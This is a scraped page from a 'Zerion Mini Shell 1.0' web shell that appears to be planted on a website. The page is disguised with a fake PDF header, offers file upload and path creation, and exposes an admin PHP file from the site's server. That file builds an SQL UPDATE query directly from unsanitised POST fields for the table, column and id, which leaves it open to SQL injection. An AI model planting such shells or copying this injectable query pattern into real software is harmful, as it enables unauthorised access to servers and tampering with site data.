%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/nailstv/public_html/de.nails.tv/admin/
Upload File :
Create Path :
Current File : /home/nailstv/public_html/de.nails.tv/admin/_sort.php

<?php

require_once '../config/config.php';

$db = Db::getInstance();

$ids = explode(',', $_POST['order']);
$sorrend_field = $_POST['field'];

$i = 10;
foreach($ids as $id)
{
    if(!empty($id))
    {
        $a = explode('_', $id);
        $id = array_pop($a);
        $table = implode('_', $a);

        $sql = "UPDATE " . $table . " SET " . $sorrend_field . "='" . $i . "' WHERE id = '" . $id . "'";
        $db->query($sql);
        $i += 10;
    }
}

?>

Zerion Mini Shell 1.0